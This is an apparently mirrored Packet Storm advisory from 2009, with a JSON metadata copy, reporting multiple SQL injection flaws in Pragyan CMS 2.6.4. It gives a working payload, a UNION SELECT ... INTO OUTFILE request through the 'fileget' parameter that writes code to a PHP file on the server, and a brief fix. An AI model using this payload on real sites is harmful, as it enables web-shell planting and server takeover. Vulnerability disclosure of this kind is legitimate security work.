Search...

Pragyan CMS 2.6.4 SQL Injection

2009-04-28T00:00:00

ID PACKETSTORM:77008
Type packetstorm
Reporter Salvatore Fresta
Modified 2009-04-28T00:00:00

Description

                                        
                                            `******* Salvatore "drosophila" Fresta *******  
  
[+] Application: Pragyan CMS  
[+] Version: 2.6.4  
[+] Website: http://www.pragyan.org  
  
[+] Bugs: [A] Multiple SQL Injection  
  
[+] Exploitation: Remote  
[+] Date: 22 Apr 2009  
  
[+] Discovered by: Salvatore "drosophila" Fresta  
[+] Author: Salvatore "drosophila" Fresta  
[+] Contact: e-mail: drosophilaxxx@gmail.com  
  
  
*************************************************  
  
[+] Menu  
  
1) Bugs  
2) Code  
3) Fix  
  
  
*************************************************  
  
[+] Bugs  
  
  
- [A] Multiple SQL Injection  
  
[-] Risk: hight  
[-] Requisites: magic_quotes_gpc = off/on  
  
This web application is entirely vulnerable to  
SQL Injection because any variable is not  
properly sanitised before being used in an SQL  
query. This can be exploited to manipulate SQL  
queries by injecting arbitrary SQL code.  
  
  
*************************************************  
  
[+] Code  
  
  
- [A] Multiple SQL Injection  
  
http://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT  
'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23  
  
  
*************************************************  
  
[+] Fix  
  
You must sanitise any user input.  
  
  
*************************************************  
  
--   
Salvatore "drosophila" Fresta  
CWNP444351  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:77008", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Pragyan CMS 2.6.4 SQL Injection", "description": "", "published": "2009-04-28T00:00:00", "modified": "2009-04-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/77008/Pragyan-CMS-2.6.4-SQL-Injection.html", "reporter": "Salvatore Fresta", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:25:17", "viewCount": 1, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:25:17", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:25:17", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/77008/pragyancms-sql.txt", "sourceData": "`******* Salvatore \"drosophila\" Fresta ******* \n \n[+] Application: Pragyan CMS \n[+] Version: 2.6.4 \n[+] Website: http://www.pragyan.org \n \n[+] Bugs: [A] Multiple SQL Injection \n \n[+] Exploitation: Remote \n[+] Date: 22 Apr 2009 \n \n[+] Discovered by: Salvatore \"drosophila\" Fresta \n[+] Author: Salvatore \"drosophila\" Fresta \n[+] Contact: e-mail: drosophilaxxx@gmail.com \n \n \n************************************************* \n \n[+] Menu \n \n1) Bugs \n2) Code \n3) Fix \n \n \n************************************************* \n \n[+] Bugs \n \n \n- [A] Multiple SQL Injection \n \n[-] Risk: hight \n[-] Requisites: magic_quotes_gpc = off/on \n \nThis web application is entirely vulnerable to \nSQL Injection because any variable is not \nproperly sanitised before being used in an SQL \nquery. This can be exploited to manipulate SQL \nqueries by injecting arbitrary SQL code. \n \n \n************************************************* \n \n[+] Code \n \n \n- [A] Multiple SQL Injection \n \nhttp://www.site.com/path/?action=view&fileget=-1' UNION ALL SELECT \n'evil_code',2,3,4,5,6,7 INTO OUTFILE '/path/evil.php'%23 \n \n \n************************************************* \n \n[+] Fix \n \nYou must sanitise any user input. \n \n \n************************************************* \n \n-- \nSalvatore \"drosophila\" Fresta \nCWNP444351 \n`\n", "immutableFields": []}